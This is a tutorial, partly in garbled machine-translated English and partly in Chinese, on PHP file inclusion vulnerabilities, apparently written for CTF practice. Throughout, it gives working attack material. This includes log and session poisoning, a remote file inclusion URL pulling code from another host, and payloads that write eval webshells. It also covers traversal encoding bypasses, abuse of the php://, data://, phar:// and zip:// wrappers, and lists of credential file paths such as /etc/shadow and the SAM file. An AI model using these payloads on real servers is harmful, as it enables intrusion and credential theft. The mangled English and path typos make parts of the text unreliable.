A. Meaning
When introducing a file server function by script, because the incoming file name has not been reasonable verification, in order to operate a document other than expected, resulting in accidental leaks of documents and even malicious code injection.
II. Common Functions
php file contains common functions the following four:
require()
require_once()
include()
include_once()
includeAnd requirethe main difference is: includethe process contained If an error occurs, a warning is thrown, the program continues to run normally; and requirea function of an error when the error and will directly withdraw from the program.
include_once()和require_once():These two functions are included only once for during script execution is possible with a case file to be included more than once, you want to make sure it is only included once to avoid problems with function redefinitions, variable value reassignments, and other issues.
III. Causes of vulnerability
Vulnerability causes
Parameter file contains functions to load without filtering or strict definition, controlled by the user, contains other malicious files, leading to the unintended execution of code.
Sample Code
<?php
$filename = $_GET['filename'];
include($filename); ?>$_GET['filename']Parameters developers do not undergo a rigorous filtering, directly into the include function, the attacker can modify $_GET['filename']the values, perform unexpected operation.
IV. Vulnerability species
1. Include the Apache log files
WEB server generally sends the user's access records stored in the access log. Then we can based on the contents of the log records, crafted request, the PHP code into the log file to execute PHP code via the log file that contains the vulnerability.
After running a general default Apache generates two log files, under Windos is access.log (access logs) and error.log (error logs), under Linux is access_log and error_log, access log file records each request the client and the server response information.
If access to a resource that does not exist, such as http://www.xxxx.com/<?php phpinfo ();?>, Will be recorded in the log, but the code sensitive characters are transcoded browser, we can be bypassed by burpsuit coding, you can put <php phpinfo ();??> write apache log files, then you can do this by including the code log file, but only if you know apache log file storage path so to be safe, try not to use the default path when you install apache.
2. unlimited local Inclusion Vulnerabilities
Test code:
<?php
$filename = $_GET['filename'];
include($filename); ?>Test Results:
Available through directory traversal vulnerability to the contents of other files in the system:
Common Path sensitive information:
Windows System
c: \ boot.ini // Check system version
c: \ windows \ system32 \ inetsrv \ MetaBase.xml // IIS configuration file
c: \ windows \ repair \ sam // storage system first installed Windows password
c: \ ProgramFiles \ mysql \ my.ini // MySQL arrangement
c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码
c: \ windows \ php.ini // php configuration information
Linux / Unix systems
/ Etc / passwd // account information
/ Etc / shadow // account password file
/usr/local/app/apache2/conf/httpd.conf // Apache2 default profile
/usr/local/app/apache2/conf/extra/httpd-vhost.conf // configure virtual Web site
/usr/local/app/php5/lib/php.ini // PHP configuration
/etc/httpd/conf/httpd.conf // Apache configuration file
/etc/my.conf // mysql configuration file
3. SESSION file contains contains loopholes
According to the can first try to contain SESSION file, looking for a controlled variable based on the file content, inserted into the document in the construction payload, it can be included at the end.
Use conditions:
● controlled variables found in the Session
● the Session-write file, and a storage path know
Save the file path session 1.php can be seen in the phpinfo session.save_path.
2.session common storage path:
● / var / lib / PHP / sess_PHPSESSID
● / var / lib / PHP / sess_PHPSESSID
● / tmp / sess_PHPSESSID
● / tmp / Sessions / sess_PHPSESSID
● the session file formats: sess_ [phpsessid], and PHPSESSID request transmitted cookie field can be seen.
Example:
Vulnerability Analysis
Php will get the value of this type ctfs to the GET variables stored in the session.
When accessing http:? //Www.ctfs-wiki/session.php after ctfs = ctfs, will value stored session at / var / lib / php / session directory.
session file name sess_ + sessionid, sessionid can get by developer mode.
So session file named sess_akp79gfiedh13ho11i6f3sm6s6.
To the server's / var / lib / php / session catalog really exist at this document, it says:
username|s:4:"ctfs";
[root@c21336db44d2 session]
漏洞利用
通过上面的分析,可以知道ctfs传入的值会存储到session文件中,如果存在本地文件包含漏洞,就可以通过ctfs写入恶意代码到session文件中,然后通过文件包含漏洞执行此恶意代码getshell。
当访问http://www.ctfs-wiki/session.php?ctfs=<?php phpinfo();?>后,会在/var/lib/php/session目录下存储session的值。
[root@6da845537b27 session]# cat sess_83317220159fc31cd7023422f64bea1a
username|s:18:"
攻击者通过phpinfo()信息泄露或者猜测能获取到session存放的位置,文件名称通过开发者模式可获取到,然后通过文件包含的漏洞解析恶意代码getshell。
4.包含/pros/self/environ的漏洞
proc/self/environ中会保存user-agent头,如果在user-agent中插入php代码,则php代码会被写入到environ中,之后再包含它,即可。
利用条件:
php以cgi方式运行,这样environ才会保持UA头。
environ文件存储位置已知,且environ文件可读。
5.无限制远程文件包含漏洞
测试代码:
<?php
$filename = $_GET['filename'];
include($filename);
?> 
通过远程文件包含漏洞,包含php.txt可以解析http://www.ctfs-wiki.com/FI/FI.php?filename=http://192.168.91.133/FI/php.txt
测试结果:
6.包含临时文件
php中上传文件,会创建临时文件。在linux下使用/tmp目录,而在windows下使用c:\winsdows\temp目录。在临时文件被删除之前,利用竞争即可包含该临时文件。
由于包含需要知道包含的文件名。一种方法是进行暴力猜解,linux下使用的随机函数有缺陷,而window下只有65535中不同的文件名,所以这个方法是可行的。
另一种方法是配合phpinfo页面的php variables,可以直接获取到上传文件的存储路径和临时文件名,直接包含即可。这个方法可以参考LFI With PHPInfo Assistance
7.包含上传文件
很多网站通常会提供文件上传功能,比如:上传头像、文档等,这时就可以采取上传一句话图片木马的方式进行包含。
图片马的制作方式如下:
先进入1.jph和2.php的文件目录后,执行:
copy 1.jpg/b+2.php 3.jpg(将图片1.jpg和包含php代码的2.php文件合并生成图片马3.jpg)
假设已经上传一句话图片木马到服务器,路径为/upload/201811.jpg
图片代码如下:
<?fputs(fopen("shell.php","w"),"<?php eval($_POST['pass']);?>")?>
然后访问URL:http://www.xxxx.com/index.php?page=./upload/201811.jpg,将会在index.php所在的目录下生成shell.php
五.绕过方法
1.指定前缀绕过
(1)目录遍历
使用 ../../ 来返回上一目录,被称为目录遍历(Path Traversal)。例如 ?file=../../phpinfo/phpinfo.php
测试代码如下:
<?php
error_reporting(0);
$file = $_GET["file"];
//前缀
include "/var/www/html/".$file;
highlight_file(__FILE__);
?>
现在在/var/log目录下有文件flag.txt,则利用…/可以进行目录遍历,比如我们尝试访问:
include.php?file=../../log/flag.txt
则服务器端实际拼接出来的路径为:/var/www/html/../../log/test.txt,即 /var/log/flag.txt,从而包含成功。
(2)编码绕过
服务器端常常会对于../等做一些过滤,可以用一些编码来进行绕过。
1.利用url编码
../
%2e%2e%2f
..%2f
%2e%2e/
..\
%2e%2e%5c
..%5c
%2e%2e\
2.二次编码
../
%252e%252e%252f
..\
%252e%252e%255c
3.容器/服务器的编码方式
../
..%c0%af
注:Why does Directory traversal attack %C0%AF work?
%c0%ae%c0%ae/
注:java中会把”%c0%ae”解析为”\uC0AE”,最后转义为ASCCII字符的 ” . "
..\
..%c1%9c
2. 指定后缀绕过
后缀绕过测试代码如下,下述各后缀绕过方法均使用此代码:
<?php
error_reporting(0);
$file = $_GET["file"];
//后缀
include $file.".txt";
highlight_file(__FILE__);
?>
(1)利用url
在远程文件包含漏洞(RFI)中,可以利用query或fragment来绕过后缀限制。
可参考此文章:URI’s fragment
完整url格式:
protocol :// hostname[:port] / path / [;parameters][?query]#fragment
query(?)
[访问参数] ?file=http://localhost:8081/phpinfo.php?
[拼接后] ?file=http://localhost:8081/phpinfo.php?.txt
Example:(设在根目录下有flag2.txt文件)
fragment(#)
[访问参数] ?file=http://localhost:8081/phpinfo.php%23
[拼接后] ?file=http://localhost:8081/phpinfo.php#.txt
Example:(设在根目录下有flag2.txt文件)
(2)利用协议
PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。 除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。
目录
php:// 输入输出流
PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。
php://filter(本地磁盘文件进行读取)
元封装器,设计用于”数据流打开”时的”筛选过滤”应用,对本地磁盘文件进行读写。
用法:?filename=php://filter/convert.base64-encode/resource=xxx.php ?filename=php://filter/read=convert.base64-encode/resource=xxx.php 一样。
条件:只是读取,需要开启 allow_url_fopen,不需要开启 allow_url_include;
测试代码:
<?php
$filename = $_GET['filename'];
include($filename);
?> 
php://input
可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。 enctype=”multipart/form-data” 的时候 php://input 是无效的。
用法:?file=php://input 数据利用POST传过去。
php://input (读取POST数据)
碰到file_get_contents()就要想到用php://input绕过,因为php伪协议也是可以利用http协议的,即可以使用POST方式传数据,具体函数意义下一项;
测试代码:
<?php
echo file_get_contents("php://input");
?> 测试结果:
php://input(写入木马)
测试代码:
<?php
$filename = $_GET['filename'];
include($filename); ?> 条件:php配置文件中需同时开启 allow_url_fopen 和 allow_url_include(PHP < 5.3.0),就可以造成任意代码执行,在这可以理解成远程文件包含漏洞(RFI),即POST过去PHP代码,即可执行。
如果POST的数据是执行写入一句话木马的PHP代码,就会在当前目录下写入一个木马。
<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?> 
测试结果:
如果不开启allow_url_include会报错:
php://input(命令执行)
测试代码:
<?php
$filename = $_GET['filename'];
include($filename);
?> 条件:php配置文件中需同时开启 allow_url_fopen 和 allow_url_include(PHP < 5.30),就可以造成任意代码执行,在这可以理解成远程文件包含漏洞(RFI),即POST过去PHP代码,即可执行;
如果不开启allow_url_include会报错:
file://伪协议 (读取文件内容)
通过file协议可以访问本地文件系统,读取到文件的内容
测试代码:
<?php
$filename = $_GET['filename'];
include($filename);
?> 
data://伪协议
数据流封装器,和php://相似都是利用了流的概念,将原本的include的文件流重定向到了用户可控制的输入流中,简单来说就是执行文件的包含方法包含了你的输入流,通过你输入payload来实现目的; data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4
data://(读取文件)
和php伪协议的input类似,碰到file_get_contents()来用; <?php // 打印 “I love PHP” echo file_get_contents(‘data://text/plain;base64,SSBsb3ZlIFBIUAo=’); ?>
注意:<span style="color: rgb(121, 121, 121);"><?php phpinfo(); 这类执行代码最后没有?> </span>闭合;
如果php.ini里的allow_url_include=On(PHP < 5.3.0),就可以造成任意代码执行,同理在这就可以理解成远程文件包含漏洞(RFI) 测试代码:
<?php
$filename = $_GET['filename'];
include($filename); ?> 
phar://伪协议
这个参数是就是php解压缩包的一个函数,不管后缀是什么,都会当做压缩包来解压。
用法:?file=phar://压缩包/内部文件 phar://xxx.png/shell.php 注意: PHP > =5.3.0 压缩包需要是zip协议压缩,rar不行,将木马文件压缩后,改为其他任意格式的文件都可以正常使用。 步骤: 写一个一句话木马文件shell.php,然后用zip协议压缩为shell.zip,然后将后缀改为png等其他格式。
测试代码:
<?php
$filename = $_GET['filename'];
include($filename);
?> 
zip://伪协议
zip伪协议和phar协议类似,但是用法不一样。
用法:?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名] zip://xxx.png#shell.php。
条件: PHP > =5.3.0,注意在windows下测试要5.3.0<PHP<5.4 才可以 #在浏览器中要编码为%23,否则浏览器默认不会传输特殊字符。
测试代码:
<?php
$filename = $_GET['filename'];
include($filename);
?> 
3.长度截断
利用条件:
php版本 < php 5.2.8
原理:
Windows下目录最大长度为256字节,超出的部分会被丢弃
Linux下目录最大长度为4096字节,超出的部分会被丢弃。
测试代码:
<?php
$filename = $_GET['filename'];
include($filename . ".html"); ?> EXP:
http://www.ctfs-wiki.com/FI/FI.php
?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././.